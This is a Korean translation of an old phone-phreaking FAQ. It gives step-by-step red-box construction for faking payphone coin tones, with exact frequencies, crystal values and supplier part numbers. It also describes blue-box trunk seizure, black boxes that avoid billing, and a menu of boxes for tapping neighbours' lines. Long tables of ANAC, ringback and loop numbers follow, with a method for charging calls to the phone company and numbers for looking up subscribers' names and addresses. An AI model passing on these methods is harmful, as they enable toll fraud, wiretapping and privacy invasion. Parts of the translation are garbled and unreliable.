공중전화에 동전을 넣으면 공중전화는 ACTS(Automated Coin Toll System)에 신호음의 집합을 보낸다. 적색 상자는 ACTS가 동전을 넣었다고 믿게 속인다. 적생 상자는 TCTS 신호음을 ㅁ나들어 전화 송화기에 보낸다. ACTS는 이러한 신호음을 듣고 전화를 할 수 있게 허용한다. 실제 신호음은 다음과 같다.
Nickel Signal 1700+2200hz 0.060s on
Dime Signal 1700+2200hz 0.060s on, 0.060s off, twice repeating
Quarter Signal 1700+2200hz 33ms on, 33ms off, 5 times
repeating
카나다는 ACTSD의 변형인 N-ACTS를 이용한다. N-ACTS 는 ACTS와는 다른 음을 사용한다. 카나다에서 신호음은 다음과 같다.
tones than ACTS. In Canada, the tones to use are:
Nickel Signal 2200hz 0.060s on
Dime Signal 2200hz 0.060s on, 0.060s off, twice repeating
Quarter Signal 2200hz 33ms on, 33ms off, 5 times
repeating
적색 상자는 Radio Shack tone dialer, Hallmark greeting cards, 또는 쉽게 구할 수 있는 전자부
품을 가지고 처음부터 만들 수 있다.
적색 상자를 Shack 43-141또는 43-146 톤 다이얼러로부터
만들려고 한다면 다이얼러를 열고 crystal을 새 것으로 교체한다.
새 것으로 교체하는 목적은 * 버튼이 941Mhz와 1209Mhz 대산1700Mhz와
2200Mhz의 신호음(tone)을 내도록 하기 위해서이다. 교체해야 할 수정진동자의
값은 6.466806을 이용하여 완벽한 1700Mhz의 신호음을 6.513698을
이용하여 완벽한 2200Mhz의 음을 생성할 수 있다. 이 값에 근사한
수정진동자는 ACTS의 오차허용치 내에 들어오는 신호음을 생성할 것이다.
가장 인기좋은 것은 6.5536Mhz의 수정진동자이다. 왜냐하면 이것이
획득하기 가장 쉬운 종류이기 때문이다. 오래된 수정진동자는 크고
빛나는 금속 부품으로 "3.579545Mhz"라고 찍혀있다. 수정진동자의
교체가 끝나면, 다섯 개의 *와 함께 P1 버튼을 프로그램한다. 이것은
P1을 누를 때마다 25센트동전의 신호음을 흉내낸다.
전자부품 상접에서 구할 수 있다. Radio Shack에서 판매하고 있다. 그러나, 비싸고 가게에서도 주문을 해야 한다. 2주 정도가 걸린다. 더욱이 많은 Radio Shack 점원들은 이렇게 할 수 있다는 것도 모른다. 또는 수정진동자를 우편으로 주문할 수 있다. 여기에는 수정진동자보다 훨씬 비싼 운송비를 포함하게 된다. 따라서 여러명이 함께 주문해서 운송비를 줄이는 것이 가장 좋다. 아니면 대여섯개를 한꺼번에 산 다음 다른 사람에 팔아도 된다. 주문해서 살 수 있는 곳은 다음과 같다.
Digi-Key
701 Brooks Avenue South
P.O. Box 677
Thief River Falls, MN 56701-0677
(800)344-4539
Part Number:X415-ND /* Note: 6.500Mhz and only .197 x .433 x .149! */
Part Number:X018-ND
JDR Microdevices:
2233 Branham Lane
San Jose, CA 95124
(800)538-5000
Part Number: 6.5536MHZ
Tandy Express Order Marketing
401 NE 38th Street
Fort Worth, TX 76106
(800)241-8742
Part Number: 10068625
Alltronics
2300 Zanker Road
San Jose CA 95131
(408)943-9774 Voice
(408)943-9776 Fax
(408)943-0622 BBS
Part Number: 92A057
Mouser
(800)346-6873
Part Number: 332-1066
Blue Saguaro
P.O. Box 37061
Tucson, AZ 85740
Part Number: 1458b
Unicorn Electronics
10000 Canoga Ave, Unit c-2
Chatsworth, CA 91311
Phone: 1-800-824-3432
Part Number: CR6.5
적색 상자는 teco에서 만든 공중전화에서 작동한다. COCOT(Customer Owned Coin Operated
Telephone)에서는 작동하지 않는다.
적색 상자는 ACTS를 속여서 동적인 공중전화에 넣은
것으로 생각하게 한다. ACTS는 "XX센트을 넣어주세요"라고
발하는 전화회사의 소프트웨어로 동전을 넣는 소리를 확인한다.
공중전화는 시내전화에서 ACTS를 이용하지 않는다. 적색 상자를 시내 전화에 이용하기 위해서 ACTS를 속여서 전화에 끌어들여야 한다. 한가지 방법으로 어떤 진역에서는 10288-xxx-xxxx를 걸면된다. 이렇게하면 통화를 장거리 전화로 하고 ACTS를 끌어들이게 된다.
다른 지역에서는 Directory Assistance를 부르고 전화하려는
사람의 번호를 묻는다. 교환원은 전화번호를 가르쳐주고 "Your
call can be completed automatically for an additional 35 cents"라는
말과 유사한 것을 듣게 된다. 이렇게 되면, ACTS 톤을 이용할 수 있게
된다.
청색 기계는 2600Hz의 음을 이용하여 in-band signaling을
이용하는 전화 교환기의 제어를 잡는다. 전화를 건 사람은 특별한
교환 기능에 접근할 수 있다. 청색 상자에서 제공하는 음을 이용하여
대개 장거리 전화를 거는 목적으로 주로 이용된다.
LOD의 Marauder에 의해 작성되어 Usenet에 포스팅 된
것을 실은 FAQ이다.
"ESS 때문에 더 이상 청색 박스를 사용할 수 없다"와 같은 인용문을 어디선가 본 것 같다. 이것은 그릇된 생각이다. 내가 코네티컷에 살고 있었을 때, Step by Step, #1AESS, 그리고 DMS-100에서 청생 상자를 이용할 수 있었다. 이유는 간단하다. 내가 다른 교환기(Class 5 office, aka Central Office)에서 800번 서비스로 전화를 걸었을 때라도 800 통화가 과금 네트워크로 절달되면 그것은 New Haven #5 Crossbar toll Tandem Office를 통해서 가게 된다. 클라스 5(CO)와 클라스 4(과금 사무실, 이 경우에는 New Haven #5 Xbar) 사이 트렁크에서 신호를 보낼 때 일어난다. 그래서 어떤 번호로 걸든, 그것이 Inter-Lata 통화을 경우, 자신의 통화(call)은 이 특정 트렁크 집합을 통과하게 된다. 그리고 청색 상자를 이용할 수 있다. 발신 중앙 사무실 교환기(SXS/ESS 등)은 박스를 이용하는데 별 영향을 미치지 않는다. ESS(와 다른 전자 교환기)의 출현이 청색 상자를 이용하는 것이 좀 더 어렵게 만들었지만, ESS는 청색상자를 사용할 수 없는 이유는 못된다.
주요 원인은 CCIS의 "진행 음향 소거"기능이다. (out of band signalling). 불운하게도 Toll
Completion Center의 99%의 청색상자 이용자는 CCIS 링크를 이용하고 있다. 이것은 청색 상자을 이용하는 사람에게는 재안이다. 왜냐하면, 대부분의 MF signalling을 이용하는 트렁크를 찾기 위해 지역으로부터 전화를 지역 밖으로 걸 때, CCIS가 장치된 네트워크의 부분을 어쩔 수 없이 지나야 되기 때문에 2600hz를 보낼 교환기를 찾아서 "winkstart" 신호를 받고나서 MF 신호를 보내더라도 재명령 신호만을 받게 된다. 이것은 트렁크를 잡자마자(2600hz를 이용하여), Originating
Toll Office가 목적지에서의 통제를 잃은 것으로 본다(다시
말해서 트렁크를 기다리는 것). 재명령을 받게 되는 것은 기다리고
잇는 트렁크가 MF 톤을 듣기 못하기 때문이다. 이것은 곧 타임아웃에
걸리게 된다. 따라서 어떻게해서든 MF 신호를 이용하지만 CCISS audio
mute 문제를 피하게이나 정지시킨 곳을 찾아야 한다. (힌트: WATS
확장기를 잘 살펴본다.)
흑색 기계는 무엇인가?
흑색 상자는 저항(또는 병렬로 연결된 컨덴서)로 전화를
받았는지 전화 회사의 장비가 알 수 없도록 전화선에 설치하는 것이다.
흑색 상자가 있는 전화에 전화를 건 사람은 전화비를 지불하지 않게
된다. 흑색 상자는 ESS에서 작동하지 않는다.
유색 기계(colored box)는 모두 무슨 기능이 있나?
Acrylic Steal Three-Way-Calling, Call Waiting and programmable
Call Forwarding on old 4-wire phone systems
Aqua Drain the voltage of the FBI lock-in-trace/trap-trace
Beige Lineman's hand set
Black Allows the calling party to not be billed for the call
placed
Blast Phone microphone amplifier
Blotto Supposedly shorts every phone out in the immediate area
Blue Emulate a true operator by seizing a trunk with a 2600hz
tone
Brown Create a party line from 2 phone lines
Bud Tap into your neighbors phone line
Chartreuse Use the electricity from your phone line
Cheese Connect two phones to create a diverter
Chrome Manipulate Traffic Signals by Remote Control
Clear A telephone pickup coil and a small amp used to make free
calls on Fortress Phones
Color Line activated telephone recorder
Copper Cause crosstalk interference on an extender
Crimson Hold button
Dark Re-route outgoing or incoming calls to another phone
Dayglo Connect to your neighbors phone line
Diverter Re-route outgoing or incoming calls to another phone
DLOC Create a party line from 2 phone lines
Gold Dialout router
Green Emulate the Coin Collect, Coin Return, and Ringback tones
Infinity Remotely activated phone tap
Jack Touch-Tone key pad
Light In-use light
Lunch AM transmitter
Magenta Connect a remote phone line to another remote phone line
Mauve Phone tap without cutting into a line
Neon External microphone
Noise Create line noise
Olive External ringer
Party Create a party line from 2 phone lines
Pearl Tone generator
Pink Create a party line from 2 phone lines
Purple Telephone hold button
Rainbow Kill a trace by putting 120v into the phone line (joke)
Razz Tap into your neighbors phone
Red Make free phone calls from pay phones by generating
quarter tones
Rock Add music to your phone line
Scarlet Cause a neighbors phone line to have poor reception
Silver Create the DTMF tones for A, B, C and D
Static Keep the voltage on a phone line high
Switch Add hold, indicator lights, conferencing, etc..
Tan Line activated telephone recorder
Tron Reverse the phase of power to your house, causing your
electric meter to run slower
TV Cable "See" sound waves on your TV
Urine Create a capacitative disturbance between the ring and
tip wires in another's telephone headset
Violet Keep a payphone from hanging up
White Portable DTMF keypad
Yellow Add an extension phone
박스 개념도는 다음 FTP 사이트에서 얻을 수 있다.
ftp.netcom.com /pub/br/bradleym
ftp.netcom.com /pub/va/vandal
ftp.winternet.com /users/nitehwk
ANAC (Automatic Number Announcecement Circuit) 번호는 전화번호로서, 전화를 건 전화의
번호를 다시 들려주는 것이다. ANAC 번호는 한 쌍의
전화선의 전화번호를 알고 싶을 경우에 편리하다.
ANAC 번호 찾는 법:
NPA(Area Code)를 찾는다. 그리고 그곳에 나타난 번호를 시도해 본다. 실패하면, 나타나 있는 번
호에 1을 더해서 시도해 본다. 그것도 실패하면, 311,
958그리고 200-222-2222와 같은 일반적인 번호를 시도해 본다. 그
지역의 ANAC 번호를 찾을 경우 통보해 주었으면 좋겠다.
같은 도시 내에서도 교환기에 따라서 ANAC 번호가 다양하다. 찾고 있는 전화번호를 알기 위해서 메뉴를 따라 뒤져야 한다. 800 ANAC 번호를 남용할 경우 그 번호가 사라질 염려가 있으므로 되도록 지역 ANAC 번호를 이용하기 바란다.
N (800)425-6256 VRS Billing Systems/Integretel (800)4BLOCKME
(800)568-3197 Info Access Telephone Company's Automated Blocking Line
(800)692-6447 (800)MY-ANI-IS (Now protected by a passcode!)
N (800)858-9857 AT&T True Rewards
800번이 아닌 전지역 ANAC 번호는 404-988-9664이다. AT&T Carrier Access Code 10732로 전
화를 걸어야 한다. 이 번호를 사용할 경우, 요금이 부과되지
않는 것으로 보인다.
주의 : 이것은 참고를 위한 것이다. ANAC 번호는 같은
도시 내에서도 교환기에 따라 달라진다.
NPA ANAC number Approximate Geographic area
--- --------------- ---------------------------------------------
201 958 Hackensack/Jersey City/Newark/Paterson, NJ
202 811 District of Columbia
203 970 CT
205 300-222-2222 Birmingham, AL
205 300-555-5555 Many small towns in AL
205 300-648-1111 Dora, AL
205 300-765-4321 Bessemer, AL
205 300-798-1111 Forestdale, AL
205 300-833-3333 Birmingham
205 557-2311 Birmingham, AL
205 811 Pell City/Cropwell/Lincoln, AL
205 841-1111 Tarrant, AL
205 908-222-2222 Birmingham, AL
206 411 WA (Not US West)
207 958 ME
209 830-2121 Stockton, CA
209 211-9779 Stockton, CA
210 830 Brownsville/Laredo/San Antonio, TX
N 210 951 Brownsville/Laredo/San Antonio, TX (GTE)
212 958 Manhattan, NY
213 114 Los Angeles, CA (GTE)
213 1223 Los Angeles, CA (Some 1AESS switches)
213 211-2345 Los Angeles, CA (English response)
213 211-2346 Los Angeles, CA (DTMF response)
213 760-2??? Los Angeles, CA (DMS switches)
213 61056 Los Angeles, CA
214 570 Dallas, TX
214 790 Dallas, TX (GTE)
214 970-222-2222 Dallas, TX
214 970-611-1111 Dallas, TX (Southwestern Bell)
215 410-xxxx Philadelphia, PA
215 511 Philadelphia, PA
215 958 Philadelphia, PA
216 200-XXXX Akron/Canton/Cleveland/Lorain/Youngstown, OH
216 331 Akron/Canton/Cleveland/Lorain/Youngstown, OH
216 959-9892 Akron/Canton/Cleveland/Lorain/Youngstown, OH
217 200-xxx-xxxx Champaign-Urbana/Springfield, IL
219 550 Gary/Hammond/Michigan City/Southbend, IN
219 559 Gary/Hammond/Michigan City/Southbend, IN
N 301 2002006969 Hagerstown/Rockville, MD
301 958-9968 Hagerstown/Rockville, MD
303 958 Aspen/Boulder/Denver/Durango/Grand Junction
/Steamboat Springs, CO
N 305 200-555-1212 Ft. Lauderdale/Key West/Miami, FL
N 305 200200200200200 Ft. Lauderdale/Key West/Miami, FL
N 305 780-2411 Ft. Lauderdale/Key West/Miami, FL
310 114 Long Beach, CA (On many GTE switches)
310 1223 Long Beach, CA (Some 1AESS switches)
310 211-2345 Long Beach, CA (English response)
310 211-2346 Long Beach, CA (DTMF response)
312 200 Chicago, IL
312 290 Chicago, IL
312 1-200-8825 Chicago, IL (Last four change rapidly)
312 1-200-555-1212 Chicago, IL
313 200-200-2002 Ann Arbor/Dearborn/Detroit, MI
313 200-222-2222 Ann Arbor/Dearborn/Detroit, MI
313 200-xxx-xxxx Ann Arbor/Dearborn/Detroit, MI
313 200200200200200 Ann Arbor/Dearborn/Detroit, MI
314 410-xxxx# Columbia/Jefferson City/St.Louis, MO
315 953 Syracuse/Utica, NY
315 958 Syracuse/Utica, NY
315 998 Syracuse/Utica, NY
317 310-222-2222 Indianapolis/Kokomo, IN
317 559-222-2222 Indianapolis/Kokomo, IN
317 743-1218 Indianapolis/Kokomo, IN
334 5572411 Montgomery, AL
334 5572311 Montgomery, AL
401 200-200-4444 RI
401 222-2222 RI
402 311 Lincoln, NE
404 311 Atlanta, GA
N 770 780-2311 Atlanta, GA
404 940-xxx-xxxx Atlanta, GA
404 990 Atlanta, GA
405 890-7777777 Enid/Oklahoma City, OK
405 897 Enid/Oklahoma City, OK
U 407 200-222-2222 Orlando/West Palm Beach, FL (Bell South)
N 407 520-3111 Orlando/West Palm Beach, FL (United)
408 300-xxx-xxxx San Jose, CA
408 760 San Jose, CA
408 940 San Jose, CA
409 951 Beaumont/Galveston, TX
409 970-xxxx Beaumont/Galveston, TX
410 200-6969 Annapolis/Baltimore, MD
N 410 200-200-6969 Annapolis/Baltimore, MD
410 200-555-1212 Annapolis/Baltimore, MD
410 811 Annapolis/Baltimore, MD
412 711-6633 Pittsburgh, PA
412 711-4411 Pittsburgh, PA
412 999-xxxx Pittsburgh, PA
413 958 Pittsfield/Springfield, MA
413 200-555-5555 Pittsfield/Springfield, MA
414 330-2234 Fond du Lac/Green Bay/Milwaukee/Racine, WI
415 200-555-1212 San Francisco, CA
415 211-2111 San Francisco, CA
415 2222 San Francisco, CA
415 640 San Francisco, CA
415 760-2878 San Francisco, CA
415 7600-2222 San Francisco, CA
419 311 Toledo, OH
N 423 200-200-200 Chatanooga, Johnson City, Knoxville , TN
N 501 511 AR
502 2002222222 Frankfort/Louisville/Paducah/Shelbyville, KY
502 997-555-1212 Frankfort/Louisville/Paducah/Shelbyville, KY
503 611 Portland, OR
503 999 Portland, OR (GTE)
504 99882233 Baton Rouge/New Orleans, LA
504 201-269-1111 Baton Rouge/New Orleans, LA
504 998 Baton Rouge/New Orleans, LA
504 99851-0000000000 Baton Rouge/New Orleans, LA
508 958 Fall River/New Bedford/Worchester, MA
508 200-222-1234 Fall River/New Bedford/Worchester, A
508 200-222-2222 Fall River/New Bedford/Worchester, A
508 26011 Fall River/New Bedford/Worchester, MA
509 560 Spokane/Walla Walla/Yakima, WA
510 760-1111 Oakland, CA
512 830 Austin/Corpus Christi, TX
512 970-xxxx Austin/Corpus Christi, TX
N 513 380-55555555 Cincinnati/Dayton, OH
515 5463 Des Moines, IA
515 811 Des Moines, IA
516 958 Hempstead/Long Island, NY
516 968 Hempstead/Long Island, NY
517 200-222-2222 Bay City/Jackson/Lansing, MI
517 200200200200200 Bay City/Jackson/Lansing, MI
518 511 Albany/Schenectady/Troy, NY
518 997 Albany/Schenectady/Troy, NY
518 998 Albany/Schenectady/Troy, NY
N 540 211 Roanoke, VA (GTE)
N 540 311 Roanoke, VA (GTE)
N 541 200 Bend, OR
603 200-222-2222 NH
606 997-555-1212 Ashland/Winchester, KY
606 711 Ashland/Winchester, KY
607 993 Binghamton/Elmira, NY
609 958 Atlantic City/Camden/Trenton/Vineland, NJ
610 958 Allentown/Reading, PA
610 958-4100 Allentown/Reading, PA
612 511 Minneapolis/St.Paul, MN
614 200 Columbus/Steubenville, OH
614 571 Columbus/Steubenville, OH
615 200200200200200 Chatanooga/Knoxville/Nashville, TN
615 2002222222 Chatanooga/Knoxville/Nashville, TN
615 830 Nashville, TN
616 200-222-2222 Battle Creek/Grand Rapids/Kalamazoo, I
617 200-222-1234 Boston, MA
617 200-222-2222 Boston, MA
617 200-444-4444 Boston, MA (Woburn, MA)
617 220-2622 Boston, MA
617 958 Boston, MA
618 200-xxx-xxxx Alton/Cairo/Mt.Vernon, IL
618 930 Alton/Cairo/Mt.Vernon, IL
619 211-2001 San Diego, CA
619 211-2121 San Diego, CA
N 659 220-2622 Newmarket, NH
N 703 211 VA
N 703 511-3636 Culpeper/Orange/Fredericksburg, VA
703 811 Alexandria/Arlington/Roanoke, VA
704 311 Asheville/Charlotte, NC
N 706 940-xxxx Augusta, GA
707 211-2222 Eureka, CA
708 1-200-555-1212 Chicago/Elgin, IL
708 1-200-8825 Chicago/Elgin, IL (Last four change rapidly)
708 200-6153 Chicago/Elgin, IL
708 724-9951 Chicago/Elgin, IL
713 380 Houston, TX
713 970-xxxx Houston, TX
713 811 Humble, TX
N 713 380-5555-5555 Houston, TX
714 114 Anaheim, CA (GTE)
714 211-2121 Anaheim, CA (PacBell)
714 211-2222 Anaheim, CA (Pacbell)
N 714 211-7777 Anaheim, CA (Pacbell)
716 511 Buffalo/Niagara Falls/Rochester, NY (Rochester Tel)
716 990 Buffalo/Niagara Falls/Rochester, NY (Rochester Tel)
717 958 Harrisburg/Scranton/Wilkes-Barre, PA
718 958 Bronx/Brooklyn/Queens/Staten Island, NY
N 770 940-xxx-xxxx Marietta/Norcross, GA
N 770 780-2311 Marietta/Norcross, GA
802 2-222-222-2222 Vermont
802 200-222-2222 Vermont
802 1-700-222-2222 Vermont
802 111-2222 Vermont
N 804 990 Virginia Beach, VA
805 114 Bakersfield/Santa Barbara, CA
805 211-2345 Bakersfield/Santa Barbara, CA
805 211-2346 Bakersfield/Santa Barbara, CA (Returns DTMF)
805 830 Bakersfield/Santa Barbara, CA
806 970-xxxx Amarillo/Lubbock, TX
810 200200200200200 Flint/Pontiac/Southfield/Troy, I
N 810 311 Pontiac/Southfield/Troy, MI
812 410-555-1212 Evansville, IN
813 311 Ft. Meyers/St. Petersburg/Tampa, FL
N 815 200-3374 Crystal Lake, IL
N 815 270-3374 Crystal Lake, IL
N 815 770-3374 Crystal Lake, IL
815 200-xxx-xxxx La Salle/Rockford, IL
815 290 La Salle/Rockford, IL
817 211 Ft. Worth/Waco, TX
817 970-611-1111 Ft. Worth/Waco, TX (Southwestern Bell)
818 1223 Pasadena, CA (Some 1AESS switches)
818 211-2345 Pasadena, CA (English response)
818 211-2346 Pasadena, CA (DTMF response)
N 860 970 CT
903 970-611-1111 Tyler, TX
904 200-222-222 Jackonsville/Pensacola/Tallahasee, FL
906 1-200-222-2222 Marquette/Sault Ste. Marie, MI
907 811 AK
908 958 New Brunswick, NJ
N 909 111 Riverside/San Bernardino, CA (GTE)
910 200 Fayetteville/Greensboro/Raleigh/Winston-Salem, NC
910 311 Fayetteville/Greensboro/Raleigh/Winston-Salem, NC
910 988 Fayetteville/Greensboro/Raleigh/Winston-Salem, NC
914 990-1111 Peekskill/Poughkeepsie/White Plains/Yonkers, NY
915 970-xxxx Abilene/El Paso, TX
N 916 211-0007 Sacramento, CA (Pac Bell)
916 461 Sacramento, CA (Roseville Telephone)
919 200 Durham, NC
919 711 Durham, NC
N 954 200-555-1212 Ft. Lauderdale, FL
N 954 200200200200200 Ft. Lauderdale, FL
N 954 780-2411 Ft. Lauderdale, FL
Canada:
204 644-4444 Manitoba
306 115 Saskatchewan
403 311 Alberta, Yukon and N.W. Territory
403 908-222-2222 Alberta, Yukon and N.W. Territory
403 999 Alberta, Yukon and N.W. Territory
416 997-xxxx Toronto, Ontario
506 1-555-1313 New Brunswick
514 320-xxxx Montreal, Quebec
U 514 320-1232 Montreal, Quebec
U 514 320-1223 Montreal, Quebec
U 514 320-1233 Montreal, Quebec
519 320-xxxx London, Ontario
604 1116 British Columbia
604 1211 British Columbia
604 211 British Columbia
613 320-2232 Ottawa, Ontario
705 320-4567 North Bay/Saulte Ste. Marie, Ontario
N 819 320-1112 Quebec
Australia:
+61 03-552-4111 Victoria 03 area
+612 19123 All major capital cities
+612 11544
United Kingdom:
175
Israel:
110
재신호 번호란 전화가 걸려왔던 곳으로 즉시 다시 전화를
거는 번호이다.
대부분의 경우, 재신호 번호에 전화를 걸고
'x'는 전화를 걸고 있는 곳의 전화 번호를 대신 넣어야 할 곳이다. '?'는 지역에 있는 교환기마다
달라지거나 시간에 따라 달라지는 번호를 말한다. 가능한 모든 조합을 시도해 보기 바란다.
NPA에 대한 재신호 번호가 없다면, 114, 951-xxx-xxxx, 954, 957 그리고 958을 시도해보라.
그리고, 전화 회사에서 제공하는 다른 NPA 번호도 시도해 보라.
주의: 이 지리적 지역은 참고의 목적만을 위한 것이다. 재신호번호는 같은 도시 내에서도 교환기
마다 다를 수 있다.
NPA Ringback number Approximate Geographic area
--- --------------- ---------------------------------------------
201 55?-xxxx Hackensack/Jersey City/Newark/Paterson, NJ
202 958-xxxx District of Columbia
203 99?-xxxx CT
206 571-xxxx WA
N 208 59X-xxxx ID
208 99xxx-xxxx ID
N 210 211-8849-xxxx Brownsville/Laredo/San Antonio, TX (GTE)
213 1-95x-xxxx Los Angeles, CA
N 214 971-xxxx Dallas, TX
215 811-xxxx Philadelphia, PA
216 551-xxxx Akron/Canton/Cleveland/Lorain/Youngstown, OH
219 571-xxx-xxxx Gary/Hammond/Michigan City/Southbend, IN
219 777-xxx-xxxx Gary/Hammond/Michigan City/Southbend, IN
301 579-xxxx Hagerstown/Rockville, MD
301 958-xxxx Hagerstown/Rockville, MD
303 99X-xxxx Grand Junction, CO
304 998-xxxx WV
305 999-xxxx Ft. Lauderdale/Key West/Miami, FL
312 511-xxxx Chicago, IL
312 511-xxx-xxxx Chicago, IL
312 57?-xxxx Chicago, IL
315 98x-xxxx Syracuse/Utica, NY
317 777-xxxx Indianapolis/Kokomo, IN
317 yyy-xxxx Indianapolis/Kokomo, IN (y=3rd digit of phone number)
319 79x-xxxx Davenport/Dubuque, Iowa
334 901-xxxx Montgomery, AL
401 98?-xxxx RI
404 450-xxxx Atlanta, GA
407 988-xxxx Orlando/West Palm Beach, FL
408 470-xxxx San Jose, CA
408 580-xxxx San Jose, CA
412 985-xxxx Pittsburgh, PA
414 977-xxxx Fond du Lac/Green Bay/Milwaukee/Racine, WI
414 978-xxxx Fond du Lac/Green Bay/Milwaukee/Racine, WI
415 350-xxxx San Francisco, CA
417 551-xxxx Joplin/Springfield, MO
501 221-xxx-xxxx AR
501 721-xxx-xxxx AR
502 988 Frankfort/Louisville/Paducah/Shelbyville, KY
503 541-XXXX OR
504 99x-xxxx Baton Rouge/New Orleans, LA
504 9988776655 Baton Rouge/New Orleans, LA
505 59?-xxxx New Mexico
512 95X-xxxx Austin, TX
513 951-xxxx Cincinnati/Dayton, OH
513 955-xxxx Cincinnati/Dayton, OH
513 99?-xxxx Cincinnati/Dayton, OH (X=0, 1, 2, 3, 4, 8 or 9)
N 515 559-XXXX Des Moines, IA
516 660-xxx-xxxx Hempstead/Long Island, NY
601 777-xxxx MS
609 55?-xxxx Atlantic City/Camden/Trenton/Vineland, NJ
610 811-xxxx Allentown/Reading, PA
612 511 Minneapolis/St.Paul, MN
612 999-xxx-xxxx Minneapolis/St.Paul, MN
N 613 999-xxx-xxxx Ottawa, Ontario
614 998-xxxx Columbus/Steubenville, OH
615 920-XXXX Chatanooga/Knoxville/Nashville, TN
615 930-xxxx Chatanooga/Knoxville/Nashville, TN
616 946-xxxx Battle Creek/Grand Rapids/Kalamazoo, I
619 331-xxxx San Diego, CA
619 332-xxxx San Diego, CA
N 659 981-XXXX Newmarket, NH
N 703 511-xxx-xxxx VA
703 958-xxxx Alexandria/Arlington/Roanoke, VA
708 511-xxxx Chicago/Elgin, IL
N 713 231-xxxx Los Angeles, CA
714 330? Anaheim, CA (GTE)
714 33?-xxxx Anaheim, CA (PacBell)
716 981-xxxx Rochester, NY (Rochester Tel)
718 660-xxxx Bronx/Brooklyn/Queens/Staten Island, NY
719 99x-xxxx Colorado Springs/Leadville/Pueblo, CO
801 938-xxxx Utah
801 939-xxxx Utah
802 987-xxxx Vermont
804 260 Charlottesville/Newport News/Norfolk/Richmond, VA
805 114 Bakersfield/Santa Barbara, CA
805 980-xxxx Bakersfield/Santa Barbara, CA
810 951-xxx-xxxx Pontiac/Southfield/Troy, MI
813 711 Ft. Meyers/St. Petersburg/Tampa, FL
817 971 Ft. Worth/Waco, TX (Flashhook, then 2#)
906 951-xxx-xxxx Marquette/Sault Ste. Marie, MI
908 55?-xxxx New Brunswick, NJ
908 953 New Brunswick, NJ
913 951-xxxx Lawrence/Salina/Topeka, KS
914 660-xxxx-xxxx Peekskill/Poughkeepsie/White Plains/Yonkers, NY
Canada:
204 590-xxx-xxxx Manitoba
416 57x-xxxx Toronto, Ontario
416 99x-xxxx Toronto, Ontario
416 999-xxx-xxxx Toronto, Ontario
506 572+xxx-xxxx New Brunswick
514 320-xxx-xxxx Montreal, Quebec
519 999-xxx-xxxx London, Ontario
N 604 311-xxx-xxxx British Columbia
613 999-xxx-xxxx Ottawa, Ontario
705 999-xxx-xxxx North Bay/Saulte Ste. Marie, Ontario
N 819 320-xxx-xxxx Quebec
N 905 999-xxx-xxxx Hamilton/Mississauga/Niagra Falls, Ontario
Australia: +61 199
Brazil: 109 or 199
N France: 3644
Holland: 99-xxxxxx
New Zealand: 137
Sweden: 0058
United Kingdom: 174 or 1744 or 175 or 0500-89-0011
N Amsterdam 0196
N Hilversum 0123456789
N Breukelen 0123456789
N Groningen 951
이 FAQ는 ToneLoc v0.99 사용자 매뉴얼에서 발췌한 것이다.
Loop(연결번호)란 전화번호의 쌍으로 대개는 바로 붙어 있는 번호이다. 예를 들어 836-9998과 836-9999와 같다. 이 번호는 전화회사에서 테스트를 하기 위해서 사용한다. 그렇다면 연결번호가 우리에게 좋은 이유는 무엇인가? 몇 가지 좋에서 좋다. 여기 간단한 연결번호 사용 방법이 있다.
각 연결번호는 두 개의 끝(end)이 있다. 'high' end와
'low' end이다. 한 쪽 끝은 전화가 걸려오면 대개 지속적이고, 시끄러운
음(tone)을 낸다. 다른 한 쪽은 조용하다. 연결번호는 대개 신호음이
울리지 않는다. 두 끝에 전화를 걸면, 연결번호를 통해 대화가 가능하다.
연결번호는 음성을 차단하여 지송적인 음을 제외한 아무 것도 통과
시키지 않는 것도 있다. 이런 것들은 우리에게 별로 소용이 없다.
여기에 연결번호를 어떻게 이용하는지 대한 것이 있다. 전화요금을
물리는 것!! 먼저, 시끄러운 움이 나는 한 쪽 끝에 전화를 건다. 교환원이나
다른 사람이 다른 쪽 끝에 전화를 걸면 음이 조용해진다. 금방 전화를
받은 것처럼 응답을 한다. "여보세요", "안녕",
"챠오", "여" 등 아무거나. 그럼 교환원은 전화를
딴 곳으로 걸었다고 생각한다. 그러면 됐다. 이제 전화요금은 연결번호로
나간다. 지역 RBOC가 전화요금을 내게 된다. 이 방법은 신중하게 사용해야
한다. 그렇지 않으면, 연결번호가 없어질 것이다. 연결번호는 전화
번호를 가르쳐주고 싶지 않은 사람에게 전화할 수 있는 좋은 방법이다.
번호중에서 많은 수가 더 이상 사용할 수 없는 것이다.
이 연결번호가 있는 곳에 산다면, 시도해 보고 메일로 결과를 알려주기
바란다.
CNA는 Customer Name and Address(고객 이름과 주소)를
나타낸다. CNA 번호는 전화회사 직원이 사용하는 번호로 전화를 걸어서
전화 번호에 대한 정보를 얻을 수 있는 것이다. 전화수리공이 알 수
없는 전화선을 발견하면, ANI 번호를 이용하여 전화 번호를 찾을 수
있고, CNA 교환원에 전화를 걸어, 누가 그 번호를 소유하고 그 사람이
어디에 살고 있는지 알 수 있다.
정상적일 경우 CNA 번호는 전화국 직원만이 알 수 있다.
사유 회사에서 CNA 정보를 얻을 수 있다. 아래의 두 회사가 그런 중류다.
이 번호는 900번 서비스로 분당 1달러 정도가 든다.
312나 708 국번 번호를 쓴다면, AmeriTech가 일반인을
위한 CNA 서비스를 하고 있다. 번호는 796-9000이다. 가격은 $.35/call
이다. 그리고 통화당 2개의 번호를 찾아 볼 수 있다.
415 번호 지역에 있다면, Pacific Bell에서 CNL 서비스를
(415)705-9299번으로 하고 있다.
Bell Atlantic 지역에서 전화를 이용하고 있다면 (201)555-5454번이나,
(908)555-5454번으로 걸어서 CNA를 이용할 수 있다. 가격은 통화당
$.50이다.
203 (203)771-8080 CT
312 (312)796-9600 Chicago, IL
506 (506)555-1313 New Brunswick
513 (513)397-9110 Cincinnati/Dayton, OH
516 (516)321-5700 Hempstead/Long Island, NY
614 (614)464-0123 Columbus/Steubenville, OH
813 (813)270-8711 Ft. Meyers/St. Petersburg/Tampa, FL
NYNEX (518)471-8111 New York, Connecticut, Vermont, Rhode
Island, New Hampshire, and Massachusetts
다음 목록에서, "xxx"는 여러 프리픽스에서 계속적으로 통화중인 같은 번호를 의미한다. 이것들의 대부분에는 통화중 음을 내는 교환과 정상적인 교환이 있다. *ALWAYS* 한창 전화 통화가 많은 경우 항상 이러한 번호를 3 번 정도 테스트 한다.
N 800 999-1803 WATS
N 201 635-9970 Hackensack/Jersey City/Newark/Paterson, NJ
N 212 724-9970 Manhattan, NY
N 213 xxx-1117 Los Angeles, CA
N 213 xxx-1118 Los Angeles, CA
N 213 xxx-1119 Los Angeles, CA
